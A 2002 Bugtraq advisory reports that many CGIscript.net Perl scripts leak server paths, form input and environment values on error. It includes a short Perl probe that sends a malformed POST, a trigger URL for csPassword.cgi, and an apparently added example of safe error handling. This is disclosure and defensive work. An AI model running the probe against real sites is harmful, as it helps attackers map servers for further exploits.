From:	 Steve Gustin <stegus1@yahoo.com>
To:	 bugtraq@securityfocus.com
Subject: 14+ CGIscript.net scripts - Path Disclosure
Date:	 Fri, 17 May 2002 14:31:23 -0700 (PDT)

14+ CGIscript.net scripts - Path Disclosure
---------------------------------------------------------------------

Name      : 14+ CGIscript.net scripts - Path Disclosure
Date      : May 17, 2002

Product   : csBanner.cgi
            csCreatePro.cgi
            CSDownload.cgi
            csFAQ.cgi
            CSFiler.cgi
            CSFileshare.cgi
            CSGrid.cgi
            CSIncludes.cgi
            CSMailto.cgi
            CSNews.cgi
            CSNews.cgi (csNewsPro - same filename)
            CSPassword.cgi
            CSRandomText.cgi
            CSUpload.cgi

Vuln Type : Failure to Handle Exceptional Conditions
Severity  : LOW RISK

Vendor    : WWW.CGIscript.NET, LLC.
Homepage  : http://www.cgiscript.net/


DISCUSSION:
---------------------------------------------------------------------
CGIscript.net sells Perl CGI web scripts developed by
Mike Barone and Andy Angrick.  Recently, a number of
these scripts have been shown to have serious security
vulnerabilities, and more problems continue to emerge.
This, plus the fact that the unique "csScriptName.cgi"
script names are easily located with search engines,
makes the scripts a prime target for attackers.

Most recently, it's been found that almost all the
scripts will display "debug" data on errors including
server paths, form input, and environment values.

While this information by itself isn't enough to
compromise a server or application, it makes it easier
for an attacker to exploit other problems that may
exist on the server or with the application.

Additionally, because the scripts use the %in hash
first for form input and later for script or database
data, it may be possible to view sensitive data by
causing the script to generate an error at a specific
point in the program's execution.


EXPLOIT:
---------------------------------------------------------------------
Because many of the scripts use CGI.pm to process file
uploads, causing CGI.pm to die with an error makes the
script display the debug data.  One way to do this is
to send an invalid POST request with something like
the following script:

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data

use strict;
use IO::Socket::INET;    # module name is case-sensitive

my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';

# connect to the web server, stop with a message if that fails
my $sock = IO::Socket::INET->new("$host:80")
    or die "cannot connect to $host:80: $@\n";

# multipart POST with a bogus boundary and no body; CGI.pm dies
# while parsing it and the script prints its debug dump
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;           # echo whatever the server sent back
close($sock);

The following scripts will generate a "debug" error
message when a CGI.pm error occurs, including server
paths, form input, and environment values.
------------------
csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi

Additional scripts can be made to generate errors in
other ways.  csPassword.cgi, for example, displays the
debug data when you make a request for:

csPassword.cgi?command=remove

which calls a function that, while referenced by the
program, doesn't exist and subsequently generates an
error and displays the debug data.
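Both failure modes above (CGI.pm dying while parsing a malformed multipart body, and a "command" value that reaches a subroutine the program never defined) have the same root cause: the script lets Perl's default error output, plus its own dump of %in and %ENV, reach the browser.  The following is an added example written for this posting, not code from CGIscript.net or from the advisory author.  It shows the shape of a Perl CGI that keeps diagnostics in the web server's error log and returns only a generic message to the client.  The command names, the handler bodies and the log format are assumptions; CGI->new(), cgi_error() and header() are real CGI.pm calls.

```perl
#!/usr/bin/perl
# safe_error_handling.cgi
# Added example (not CGIscript.net code). Diagnostic detail goes to
# STDERR, which the web server writes to its error log; the client
# only ever sees a generic message. Command names and handlers are
# placeholders.

use strict;
use warnings;
use CGI;

# Dispatch table: only commands listed here can be invoked. A request
# for any other "command" value falls through to fail() instead of
# calling a subroutine that may not exist.
my %dispatch = (
    show   => \&cmd_show,
    update => \&cmd_update,
);

sub cmd_show   { return "show page\n" }      # placeholder handler
sub cmd_update { return "update page\n" }    # placeholder handler

# The single place that produces an error response for the client.
# Paths, form input and environment values stay out of the response.
sub fail {
    my ($log_detail) = @_;
    my $client = $ENV{REMOTE_ADDR} || 'unknown';
    print STDERR "[$0] client=$client $log_detail\n";   # error log only
    print "Status: 500 Internal Server Error\r\n";
    print "Content-type: text/plain\r\n\r\n";
    print "The request could not be processed.\n";
    exit 0;
}

# CGI.pm reacts to a malformed multipart body (bad or missing boundary)
# either by dying or, in later releases, by setting cgi_error(); trap
# both rather than letting the default die handler print the details.
my $q = eval { CGI->new() };
fail("CGI.pm failed to parse request: $@") if $@ or !defined $q;
fail("CGI.pm reported: " . $q->cgi_error) if $q->cgi_error;

my $command = $q->param('command');
$command = '' unless defined $command;

my $handler = $dispatch{$command}
    or fail("unknown command '$command'");

# Any die() inside a handler is also caught and logged, not displayed.
my $body = eval { $handler->($q) };
fail("handler '$command' died: $@") if $@;

print $q->header('text/plain');
print $body;
```

The same pattern removes the %in concern from the discussion section: because the only output path on error is fail(), a hash that happens to hold database or script data at the moment of the error is never printed, regardless of where in the program the error occurs.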


IMPACT:
---------------------------------------------------------------------
Because path disclosure alone isn't particularly
dangerous, this advisory has been rated "LOW RISK".  It
is recommended, however, that users upgrade as soon as
possible to a new version of the script(s) that does
not disclose "debug" data on errors.


SOLUTION:
---------------------------------------------------------------------
The vendor has stated that because this issue is low
risk they don't intend to patch any programs right away
but will include a patch in the next major revision.


VENDOR HISTORY:
---------------------------------------------------------------------
Apr 23, 2002 - csMailto.cgi - Remote Command Execution
http://online.securityfocus.com/archive/1/269143

Apr 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432

Mar 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169

DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
stegus1@yahoo.com.


